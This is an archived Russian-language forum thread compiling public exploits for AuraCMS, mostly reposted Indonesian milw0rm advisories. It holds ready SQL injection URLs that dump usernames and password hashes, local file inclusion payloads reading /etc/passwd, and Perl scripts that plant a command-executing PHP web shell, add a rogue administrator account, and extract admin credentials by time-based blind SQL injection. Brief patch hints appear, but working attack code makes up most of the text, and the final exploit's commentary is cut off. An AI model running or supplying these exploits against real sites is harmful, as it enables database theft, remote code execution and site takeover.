[ Обзор уязвимостей AuraCMS ] [Архив]

Просмотр полной версии : [ Обзор уязвимостей AuraCMS ]

FraiDex

15.02.2008, 17:56

AuraCMS [Forum Module] Remote SQL Injection Vulnerability

SQL инъекция в модуле Forum. Уязвимость существует из-за отсутствия фильтрации в скрипте komentar.php (сроки 27-29) данных полученных в переменной $id. Благодаря этой уязвимости существует возможность выполнять произвольные запросы в БД. Уязвимость нашёл чел с ником k1tk4t.
Уязвимый запрос:
select topikid, subjek, pengirim,reply, waktu, isi from ".$prefix."forum_topik where topikid=$id");

Exploit:

http://localhost/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20 from%20user/*

================================================== =======
AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities

SQL инъекция в скриптах 'hal.php', 'cetak.php', 'lihat.php', 'pesan.php', 'teman.php'. Версия: 1.5rc (возможно более ранние). Уязвимость найдена тем же самым челом с ником k1tk4t. Итак приступим к разбору…
hal.php
Уязвимый запрос:
$perintah="SELECT * FROM halaman WHERE id=$id";
$hasil = mysql_query( $perintah );

Exploit:
http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*

-------------------------------------------------------------------------------------------
cetak.php
Уязвимый запрос:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );

Exploit:
http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null, user,null,null%20from%20user/*

-------------------------------------------------------------------------------------------
lihat.php
Уязвимый запрос:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );

Exploit:
http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null, null,null,null%20from%20user/*
-------------------------------------------------------------------------------------------
'pesan.php
Уязвимый запрос:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
} else {
$perintah="SELECT * FROM komentar WHERE id=$id";

Exploit:
http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x 3a,password),null,null,null,null%20from%20user/*
----------------------------------------------------
teman.php
Уязвимый запрос:
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );

Exploit:
http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,passwor d),null,null,null,null,null,null%20from%20user/*

================================================== ===

AuraCMS 2.1 - Remote File Attachment - Local File Inclusion

Local File Inclusion (Локальный инклуд). Найдена данная бага тем самым челом k1tk4t. Веосия 2.1 (возможно более ранние). Уязвимость в скрипте '/mod/contak.php'.
Уязвимый код:
if ($_POST['submit']) {

$nama = text_filter($_POST['nama']);

$email = text_filter($_POST['email']);

$pesan = nl2br(text_filter($_POST['pesan'], 2));

$images = text_filter($_POST['image']);

checkemail($email);

$gfx_check = intval($_POST['gfx_check']);

if (!$nama) $error .= "Error: Please enter your name!<br />";

if (!$pesan) $error .= "Error: Please enter a message!<br />";

$code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);

if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";

if ($error) {

$tengah.='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';

} else {

if (!empty ($image_name)){

$image_name = $_FILES['image']['name'];

$image_temp = $_FILES['image']['tmp_name'];

$tempat = "files/";

@copy($_FILES[image][tmp_name], "./files/".$image_name);

if(@copy($_FILES[image][tmp_name], "./files/".$image_name)){

unlink($image);

$sukses = "Sukses Upload File ".$image_name;

}else{

$sukses = "Gagal Upload File ".$image_name;

Exploit:
http://localhost/auracms2.1/index.php?pilih=../mod/contak

-------------------------------------------------------------------------------------------
Скрипт index.php
Уязвимый код:
if (isset ($_GET['mod'])) $mod = $_GET['mod'] ; else $mod = '';

if(!isset($_GET['pilih'])){

include 'content/normal.php';

}else {

if($mod == "yes" && file_exists("mod/$_GET[pilih].php")){

include "mod/$_GET[pilih].php";

} else {

if (eregi('http://', $_GET['pilih']) or !file_exists("content/$_GET[pilih].php") or $_GET['pilih'] == 'index'){

$_GET['pilih'] = 'normal';

Exploit:
http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00

---------------------------------------------------------------------------------------------
Скрипт index.php (Версия 1.x)
Уязвимый код:
<?
if(!isset($pilih))$pilih='';
switch($pilih){
case '':
include "normal.php";
break;
default:
if($mod == "yes" && file_exists("mod/$pilih.php")){

include "mod/$pilih.php";
} else {
if (eregi('http://', $pilih) or !file_exists("$pilih.php")){
$pilih = 'normal';
}
include "$pilih.php";
}
break;
}
?>

Exploit:
http://localhost/auracms.x.x/index.php?pilih=../../../../../../../etc/passwd%00

================================================== ========

AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit

Выполнение произвольного кода. Уязвимый скрипт stat.php. Версия 1.62 (возможно более ранние)
Exploit:

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit
# Waktu : Jan 16 2008 10:00PM
# Software : AuraCMS 1.62
# AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
# Vendor : http://www.auracms.org/
# Ditemukan oleh : k1tk4t | http://newhack.org
# Lokasi : Indonesia
# Penjelasan :
#
# Kutu pada berkas "stat.php" didalam direktori /mod pada aplikasi web auracms 1.62
# ---//---
# 17. Function User_Online ($minutes, $NamaFile){
# 18. //$ip = $REMOTE_ADDR;
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (getenv("HTTP_X_FORWARDED_FOR") == ''){
# 21. $ip = getenv("REMOTE_ADDR");
# 22. }
# ---//---
# 47. fseek($f,0,SEEK_SET);
# 48. ftruncate($f,0);
# 49. array_pop($user);
# 50. foreach ($user as $line)
# 51. {
# 52. list($savedip,$savedtime) = split("\|",$line);
# 53. if ($savedip == $ip) {$savedtime = $time;$found = 1;}
# 54. if ($time < $savedtime + ($minutes * 60))
# 55. {
# 56. fputs($f,"$savedip|$savedtime\n");
# 57. $users = $users + 1;
# 58. }
# 59. }
# 60.
# 61. if ($found == 0)
# 62. {
# 63. fputs($f,"$ip|$time\n");
# 64. $users = $users + 1;
# 65. }
# 66.
# 67. fclose ($f);
# ---//---
#
# Sebagai Contoh;
# $ip = getenv("HTTP_X_FORWARDED_FOR");
# $ip = <?php phpinfo() ?> # <-- user menginjeksi phpinfo
# format yang tersimpan
# <?php phpinfo() ?>|WAKTUBERKUNJUNG
#
# pada AuraCMS versi 1.62, log di simpan pada berkas /mod/online.db.txt [Default]
#
# pada Mod Block Statistik, log disimpan pada berkas /logs/online.db.txt [Default]
#
# pada AuraCMS versi 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") bisa berakibat terjadinya "SQL Injection"
#
# => "Perbaikan Kutu stat.php"
# ---//---
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', getenv("HTTP_X_FORWARDED_FOR")) == ''){
# 21. $ip = getenv("REMOTE_ADDR");
# 22. }
# ---//---
#
# Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari,
# saya[k1tk4t] dan "Indonesian Newhack Technology" tidak bertanggung jawab akan kerusakan
# yang diakibatkan dari penyalahgunaan exploit oleh pihak lain
#
# =>
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, y3dips, L41n, cyb3rh3b, K-159, the_hydra, NoGe
# nyubi, iFX, sin~X, k1n9k0ng, bius, selikoer, aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Mulai]------------------------------------
use IO::Socket;

if(!$ARGV[2])
{
print "\n |-------------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |-------------------------------------------------------|";
print "\n | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |";
print "\n | Coded by k1tk4t |";
print "\n |-------------------------------------------------------|";
print "\n[!] ";
print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port]";
print "\n[!] Contoh : perl auracms22.pl localhost /aura162/ 80";
print "\n[!] ";
print "\n";
exit;
}

$oriserver = $ARGV[0];
$orihost = "http://".$oriserver;
$oridir = $ARGV[1];
$oriport = $ARGV[2];

print "- Melakukan Koneksi $orihost$oridir\r\n";

$injurl = "index.php?pilih=stat&mod=yes";
$injeksi = $oridir.$injurl;
$kodeterlarang = "<?php echo t4mugel4p;error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}passthru(\$_GET[cmd]);die;?>";
print "- Sedang menginjeksi kode jahat\r\n";
$injkode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
print $injkode "GET ".$injeksi." HTTP/1.1\n";
print $injkode "Host: ".$oriserver."\r\n";
print $injkode "X-Forwarded-For: ".$kodeterlarang."\r\n";
print $injkode "\r\n\r\n";
close ($injkode);

while($perintah !~ "mati")
{
$ekseurl = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah."";
$eksekusi = $oridir.$ekseurl;
print "- Sedang mencoba menjalankan kode injeksi\r\n";
$eksekode = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
print $eksekode "GET ".$eksekusi." HTTP/1.1\n";
print $eksekode "Host: ".$oriserver."\r\n";
print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11";
print $eksekode "Accept: */*\r\n";
print $eksekode "Connection: close\r\n\n";

while ($hasil = <$eksekode>)
{
print $hasil;
}
print "[+]perintah => ";
$perintah = <STDIN>;
}

# milw0rm.com [2008-01-18]

FraiDex

15.02.2008, 17:57

AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit
# Waktu : Dec 25 2007 04:50AM
# Software : AuraCMS 2.2
# Vendor : http://www.auracms.org/
# Ditemukan oleh : k1tk4t | http://newhack.org
# Lokasi : Indonesia
# Penjelasan :
#
# Kutu pada berkas "admin_users.php"
# coba kita lihat ;
# 01. <?
# 02. if(ereg(basename (__FILE__), $_SERVER['PHP_SELF']))
# 03. {
# 04. header("HTTP/1.1 404 Not Found");
# 05. exit;
# 06. }
# ---//---
# 12. if (!cek_login()){
# 13. header("location: index.php");
# 14. exit;
# 15. } else{
# ---//----
# Ada yang menarik pada berkas "admin_users.php", pada baris 02 - 06 sebenarnya berkas ini sudah cukup aman
# karena jika berkas ini dipanggil langsung dari browser [http://target.com/admin/admin_users.php] akan menjawab Not Found dan Keluar
# mmm....!!! coba perhatikan baris 12 - 15, jika "cek_login()" maka akan meneruskan ke perintah2 berikutnya.
# Disinilah kita mencoba 'bermain' ;)
# fungsi "cek_login()" ini hanya mengecek status login melalui session cookie, dengan semua level login [user,editor,administrator]
# Sehingga "admin_users.php" dapat di akses oleh user dengan level apa saja[tidak untuk TAMU],
#
# => Lantas Bagaimana Mengaksesnya, bukankah berkas "admin_users.php" tidak bisa dipanggil langsung [Baris 02 - 06] ?
# yup benar ;) "admin_users.php" tidak bisa di panggil langsung melalui browser, sekarang coba kita lihat pada berkas "index.php" ;
# ---//---
# 71. if(!isset($_GET['pilih'])){
# 72. include 'content/normal.php';
# 73. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['pilih'].'.php') && !isset($_GET['act']) && !preg_match("/\.\./",$_GET['pilih'])) {
# 74. include 'mod/'.$_GET['pilih'].'/'.$_GET['pilih'].'.php';
# 75. }else if (@$_GET['mod'] == 'yes' && file_exists('mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) {
# 76. include 'mod/'.@$_GET['pilih'].'/'.@$_GET['act'].'.php';
# 77. }else if(!isset($_GET['mod']) && !isset($_GET['act']) && file_exists('content/'.$_GET['pilih'].'.php') && !preg_match("/\.\./",$_GET['pilih'])) {
# 78. include 'content/'.$_GET['pilih'].'.php';
# 79. }else {
# 80. header("location: index.php");
# 81. exit;
# 82. }
# ---//---
# mm... perhatikan kode2 tersebut... menarik bukan?
# iya dengan berkas "index.php" inilah kita bisa mengakses "admin_users.php" atau dengan kata lain mematahkan baris 02 - 06 pada berkas "admin_users.php",
#
# => Ooo Gitu..., terus memperbaikinya gmana ?
# hehehe...
# coba ganti baris 02 - 06 pada berkas "admin_users.php" dengan ;
# ---//---
# 02. if (!defined('AURACMS_admin')) {
# 03. Header("Location: ../index.php");
# 04. exit;
# 04. }
# ---//--
# Sebenarnya code tersebut sudah ada pada berkas2 admin lainnya, terkecuali pada berkas ;
# "admin_users.php"
# "admin_poll.php"
# "admin_kalender.php"
#
# => Ada apa lagi ?
# Exploit ini dibuat untuk pengetesan belaka, bukan untuk kegiatan terlarang
# saya[k1tk4t] dan "Indonesian Newhack Technology" tidak bertanggung jawab akan kerusakan yang diakibatkan dari penyalahgunaan exploit pada site
#
# =>
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,k1n9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Mulai]------------------------------------
use IO::Socket;

if(!$ARGV[4])
{
print "\n |--------------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |--------------------------------------------------------|";
print "\n |AuraCMS 2.2 - (admin_users.php) Remote Add Admin Exploit|";
print "\n | Coded by k1tk4t |";
print "\n |--------------------------------------------------------|";
print "\n[!] ";
print "\n[!] Buat Account terlebih dahulu pada site target dan pastikan Account tesebut bisa digunakan";
print "\n[!] Username dan Password tadi akan digunakan untuk membuat Account admin dengan exploit ini";
print "\n[!] Penggunaan : perl auracms22.pl [Site] [Path] [Port] [Username] [Password] ";
print "\n[!] Contoh : perl auracms22.pl target.com /auracms2.2/ 80 bugtest 123456";
print "\n[!] ";
print "\n";
exit;
}

$oriserver = $ARGV[0];
$orihost = "http://".$oriserver;
$oridir = $ARGV[1];
$oriport = $ARGV[2];
$oriuser = $ARGV[3];
$oripass = $ARGV[4];

#Sending data...
print "- Melakukan Koneksi $orihost$oridir\r\n\r\n";
logindulu();

sub logindulu ()
{
$ldberkas = "index.php";
$ldlengkap = $oridir.$ldberkas;
$lddata = "username=".$oriuser;
$lddata.= "&password=".$oripass;
$lddata.= "&loguser=1";
$lddata.= "&submit_login=Login";
$lddatajml = length($lddata);
$ldkonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n";
print $ldkonek "POST $ldlengkap HTTP/1.1\n";
print $ldkonek "Accept: */*\r\n";
print $ldkonek "Referer: $orihost\r\n";
print $ldkonek "Accept-Language: en-us,en;q=0.5\r\n";
print $ldkonek "Content-Type: application/x-www-form-urlencoded\r\n";
print $ldkonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n";
print $ldkonek "Host: $oriserver\r\n";
print $ldkonek "Content-length: $lddatajml\r\n";
print $ldkonek "Connection: Keep-Alive\r\n";
print $ldkonek "Cache-Control: no-cache\r\n\r\n";
print $ldkonek $lddata;
print $ldkonek "\r\n\r\n";
while ($hasil = <$ldkonek>) {
if ($hasil =~ /Set-Cookie: (.*?) path=\//) { $ldkonekcookie = $ldkonekcookie.$1; }
if ($hasil =~ /<b>$oriuser<\/b>/) { buatadmin(); }
}
die "- Gagal Login\r\n";
}
sub buatadmin ()
{
close ($ldkonek);
print "- Membuat User t4mugel4p dengan level Administrator\r\n\r\n";
$baberkas = "index.php?pilih=news&act=../../admin/admin_users&mod=yes&aksi=add";
$balengkap = $oridir.$baberkas;
$badata = "user=t4mugel4p";
$badata.= "&password=t4mugel4p";
$badata.= "&email=t4mugel4p%40gelapbanget.gitu";
$badata.= "&level=Administrator";
$badata.= "&tipe=aktif";
$badata.= "&add_users=Add";
$badatajml = length($badata);
$bakonek = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Connection failed...\r\n";
print $bakonek "POST $balengkap HTTP/1.1\r\n";
print $bakonek "Accept: */*\r\n";
print $bakonek "Referer: $orihost.$balengkap\r\n";
print $bakonek "Accept-Language: en-us,en;q=0.5\r\n";
print $bakonek "Content-Type: application/x-www-form-urlencoded\r\n";
print $bakonek "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\r\n";
print $bakonek "Cookie: $ldkonekcookie\r\n";
print $bakonek "Host: $oriserver\r\n";
print $bakonek "Content-length: $badatajml\r\n";
print $bakonek "Connection: Keep-Alive\r\n";
print $bakonek "Cache-Control: no-cache\r\n\r\n";
print $bakonek $badata;
print $bakonek "\r\n\r\n";
while ($hasil = <$bakonek>) {
if ($hasil =~ /Data Berhasil Di add/) {
print "- Exploiting Selesai dan SUKSES !!!\r\n\r\n";
print "- Login admin menggunakan\r\n" ;
print "- Username : t4mugel4p\r\n";
print "- Password : t4mugel4p\r\n\r\n";
print "- Pada site $orihost$ldlengkap\r\n";
exit();
}
if ($hasil =~ /(Data Berhasil Di add)/) {
print "- Exploit Gagal\r\n";
exit();
}
}
die "- Exploit Gagal\r\n";
}

# milw0rm.com [2007-12-25]

©milw0rm.org

Дополнительно:
admin.php – собственно админка
/include/config.php – конфиг
БД:
useraura – таблица пользователей
Имена полей:
UserId
user
password

Пароли шифрованы обычным md5
Сайт разработчиков: http://auracms.org

xcedz

14.03.2008, 23:01

AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit
#!/usr/bin/perl -w
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (online.php) - Remote Blind SQL Injection Exploit
# Waktu : Feb 15 2008 01:00PM
# Software : AuraCMS
# Versi : 2.0
# 2.1
# 2.2.1
# Vendor : http://www.auracms.org/
#
# ------------------------------------
# Audit Oleh : NTOS-Team
# Lokasi : Indonesia | http://newhack.org
# Penjelasan :
#
# Kutu pada berkas "online.php"
# ---//---
# 05. $uipanda=getenv("HTTP_X_FORWARDED_FOR"); // <- Injeksi!
# 06. $uproxyserver=getenv("HTTP_VIA");
# 07. $uipproxy=getenv("REMOTE_ADDR");
# 08. $uhost=gethostbyaddr($uipproxy);
# 09. $utime=time();
# 10. $now=$utime-600; // (in seconds)
# --//--
# 12. @mysql_query("delete from useronline where timevisit<$now");
# 13. $uexists=@mysql_num_rows(@mysql_query("select id from useronline where ipproxy='$uipproxy'"));
# 14. if ($uexists>0){
# 15. @mysql_query("update useronline set timevisit='$utime' where ipproxy='$uipproxy'");
# 16. } else {
# 17. @mysql_query("insert into useronline (ipproxy,host,ipanda,proxyserver,timevisit) values('$uipproxy','$uhost','$uipanda','$uproxyser ver','$utime')"); // <- Injeksi!
# 18. }
# ---//---
# Injeksi dilakukan melalui manipulasi header X-Forwarded-For yang ditumpangi perintah SQL
# referensi mengenai injeksi SQL "INSERT" -> http://www.milw0rm.com/papers/149
#
# => Perhatian!
# "Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari"
# Segela penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami
#
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
use IO::Socket;
use strict;

if(!$ARGV[1]){
print "\n |-------------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |-------------------------------------------------------|";
print "\n | AuraCMS 2.x (online.php) Remote Blind SQL Injection |";
print "\n | Coded by NTOS-Team |";
print "\n |-------------------------------------------------------|";
print "\n[!] ";
print "\n[!] Exploit Berhasil jika magic_quotes_gpc = off pada server";
print "\n[!] Penggunaan : perl aura2x-bsqli.pl [Site] [Path] [bencmark_delay]";
print "\n[!] Contoh : perl aura2x-bsqli.pl localhost /auracms2.x/ 2500000";
print "\n[!] ";
print "\n";
exit;
}

my $delay = "2000000";
my $host = $ARGV[0];
my $dir = $ARGV[1];
if ($ARGV[2]) {
$delay = $ARGV[2];
}

print "\nTarget url : ".$host.$dir."\n\n";
$host =~ s/(http:\/\/)//;

my @array = ("user","password");

print "=> Mencoba mencari satu per satu aksara yang tepat - Sabar ya.... ;)\n\n";

sleep(1);

&blindsql();

sub blindsql() {
my $x = "";
my $i = "";
my $string = "";
my $res = "1";
for ( $x=0; $x<=$#array; $x++ ) {
my $j = 1;
$res = 1;
while ($res) {
for ($i=32;$i<=127;$i++) {
$res = 0;
if ( $x eq 1 ) {
next if ( $i < 48 );
next if ( ( $i > 57 ) and ( $i < 97 ) );
next if ( $i > 102 );
}
my $injeksi = "$i' AND IF(ASCII(SUBSTRING((SELECT ".$array[$x]." FROM useraura LIMIT 1),$j,1))=$i,BENCHMARK(".$delay.",MD5('X')),0) ,'$i','$i')/*";

my $mulai = time();
my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - Koneksi Gagal\n\n";
print $req "GET ".$dir."index.php?pilih=stat&mod=yes HTTP/1.1\r\n";
print $req "Host: $host\r\n";
print $req "X-Forwarded-For: ".$injeksi."\r\n";
print $req "Keep-Alive: 300\r\n";
print $req "Connection: Keep-Alive\r\n";
print $req "Cache-Control: no-cache\r\n";
print $req "Connection: close\r\n\r\n";
while (my $result = <$req>) {
if ( $result =~ /404 Not Found/ ) {
printf "\n\nFile not found.\n\n";
print "\n\n$result\n\n";
exit;
}
if ( $result =~ /400 Bad Request/ ) {
printf "\n\nBad request.\n\n";
print "\n\n$result\n\n";
exit;
}
}
my $akhir = time();
my $waktuproses = $akhir - $mulai;
if ( $waktuproses > 4 ) {
$string .= chr($i);
print "\n\tMendapatkan Aksara : ".chr($i)."\n\n";
$res = 1;
last;
}
print "\tMencoba Aksara : ".chr($i)."\n";
}
$j++;
if ( !$res ) {
$array[$x] = $string;
$string = "";
}
}
}
print "\n----------------------\n";
print "Admin username : $array[0]\n";
print "Admin password : $array[1]\n\n";
}

# milw0rm.com [2008-03-14]

iddqd

15.03.2008, 16:17

SQL Injection

Vulnerable: AuraCMS 2.2

Exploit:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and SQL
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install gallery update!
#

if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n ---------------------oOO---(_)---OOo--------------------";
print "\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |";
print "\n | (works only with magic quotes = off) |";
print "\n | coded by DNX |";
print "\n --------------------------------------------------------";
print "\n[!] Usage......: perl aura.pl [Host] [Path] <Options>";
print "\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/";
print "\n[!] Options....:";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my %options = ();
GetOptions(\%options, "p=s");

print "[!] Exploiting...\n";

exploit();

print "\n[!] Exploit done\n";

sub exploit
{
my $url1 = "http://".$host.$path."index.php?pilih=gallery&mod=yes";
my $url2 = "http://".$host.$path."mod/gallery/ajax/gallery_data.php";
my $ua = LWP::UserAgent->new;
my $cookie = HTTP::Cookies->new();
my $regexp = ":\"(.*?)\",\"name\"(.*)([a-fA-F0-9]{32})";
my $res = "";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

###############
# exist file? #
###############
$res = $ua->get($url2);
if(!$res->is_success)
{
die("[!] Failed, file not found\n");
}

##########################
# get cookie from server #
##########################
$res = $ua->get($url1);
$cookie->extract_cookies($res);
$ua->cookie_jar($cookie);
$ua->get($url2);
$res = $ua->get($url2);

######################
# check magic quotes #
######################
$url2 .= "?action=detail&id=&image=&albums='";
$res = $ua->get($url2);
$content = $res->content;

if($content =~ /,\"albums\":\[\"\\\\'\"],/)
{
die("[!] Failed, magic quotes on\n")
}

##############
# get hashes #
##############
$url2 .= "%20union%20select%20user,2,3,4,5,6,7,password,9,10 %20from%20useraura/*";
$res = $ua->get($url2);
$content = $res->content;

my @cont = split(/{\"files\"/, $content);
foreach (@cont)
{
if($_ =~ /$regexp/)
{
print "$1 $3\n";
}
}
}

iddqd

29.03.2008, 12:58

AuraCMS 2.x (user.php) Security Code Bypass / Add Administrator Exploit

Exploit:

#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# AuraCMS 2.x (user.php) - Security Code Bypass & Add Administrator Exploit
# Waktu : Feb 28 2008 08:00PM
# Software : AuraCMS
# Versi : 2.0
# 2.1
# 2.2.1
# Vendor : http://www.auracms.org/
#
# ------------------------------------
# Audit Oleh : NTOS-Team
# Lokasi : Indonesia | http://newhack.org
# Penjelasan :
#
# Kutu pada berkas "user.php" direktori "/content"
#---//---
# 59. if (!$nama || preg_match("/[^a-zA-Z0-9_-]/", $nama)) $error .= "Karakter Username tidak diizinkan kecuali a-z,A-Z,0-9,-, dan _<br />";
# 60. if (strlen($nama) > 10) $error .= "Username Terlalu Panjang Maksimal 10 Karakter<br />";
# 61. if (strrpos($nama, " ") > 0) $error .= "Username Tidak Boleh Menggunakan Spasi";
# 62. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 63. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT user FROM temp_useraura WHERE user='$nama'")) > 0) $error .= "Error: Username ".$nama." sudah terdaftar , silahkan ulangi.<br />";
# 64. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 65. if ($koneksi_db->sql_numrows($koneksi_db->sql_query("SELECT email FROM temp_useraura WHERE email='$email'")) > 0) $error .= "Error: Email ".$email." sudah terdaftar , silahkan ulangi.<br />";
# 66. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 67. if ($cekperaturan != "1") $error .= "You should be agree with rules and conditions of use!<br />";
# 68. if (!nama) $error .= "Error: Formulir Nama belum diisi , silahkan ulangi.<br />";
# 69. if (!password) $error .= "Error: Formulir Password belum diisi , silahkan ulangi.<br />";
# 70. if ($password != $rpassword) $error .= "Password and Retype Password Not Macth.<br />";
# 71. if (!country) $error .= "Error: Formulir Negara belum diisi , silahkan ulangi.<br />";
# 72. checkemail($email);
# 73. $code = substr(hexdec(md5("".date("F j")."".$_POST['random_num']."".$sitekey."")), 2, 6);
# 74. if (extension_loaded("gd") AND $code != $_POST['gfx_check']) $error .= "Error: Security Code Invalid<br />";
# 75.
# 76.
# 77. if ($error){
# 78. $tengah .='<table width="100%" border="0" cellspacing="0" cellpadding="0" class="middle"><tr><td><table width="100%" class="bodyline"><tr><td align="left"><img src="images/warning.gif" border="0"></td><td align="center"><font class="option">'.$error.'</font></td><td align="right"><img src="images/warning.gif" border="0"></td></tr></table></td></tr></table>';
# 79. }else{
# 80. $hasil1 = $koneksi_db->sql_query("INSERT INTO useraura (user, email, password , level, tipe, negara)VALUES('$nama', '$email', '$password','User','aktif', '$country')" );
# ---//---
# => Security Code Bypass
# baris 73 - 74 kode yang menarik,kita coba belah perlahan 2 baris ini
# $sitekey sudah terdifinisi di dalam berkas "config.php" direktori "includes"
# $_POST['random_num'] nilai acak yang dikirim melalui Form isian registrasi User secara hiden [bukan hasil isian User]
# $_POST['gfx_check'] nilai yang dikirim oleh USER melalui Form isian register User mengenai Security Code
# dan selengkap nya dapat di baca pada http://ezine.echo.or.id/ezine18/e18.005.txt
#
# => Add Administrator [INSERT Metode]
# baik... kita sudah bisa membypass sekuriti kode, sekarang buat admin baru di site target :p
# baris 71. variabel "country" jika tidak diisi hasil nya $error, namun sayang hanya sebatas itu saja aturannya :(
# kita lihat pada baris 80. VALUES('$nama', '$email', '$password','User','aktif', '$country') kembali disini tidak ada penyaringan
# apa yang kamu pikirkan... mmm... menarik... nakal... jahat... tapi INDAH bukan... ;)
# ya... bagaimana kalo kami berpikir seperti ini ;
#
# VALUES('$nama', '$email', '$password','User','aktif', 'Indonesia['),('Attacker', 'attacker@hack.ed', 'MD5_Pass', 'Administrator', 'aktif', 'Undergr0und]')" );
#
